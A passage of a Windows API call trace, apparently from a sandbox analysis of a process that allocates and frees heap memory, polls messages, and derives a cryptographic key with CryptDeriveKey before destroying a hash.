lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0159.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0159.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0159.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0159.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0159.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0159.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0159.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0159.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c80 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0159.055] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0159.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0159.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0159.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0159.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0159.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0159.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0159.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0159.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0159.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0159.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0159.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.056] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0159.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0159.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b60 [0159.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0159.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0159.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0159.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0159.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0159.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0159.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0159.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0159.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0159.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0159.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0159.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0159.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0159.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0159.384] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0159.384] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87310, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87590) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0159.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0159.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0159.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0159.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0159.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0159.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0159.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0159.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0159.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c68 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a40 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0159.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0159.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0159.387] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0159.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0159.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0159.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69c08 [0159.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69c08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0159.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0159.388] CryptDestroyHash (hHash=0xa87310) returned 1 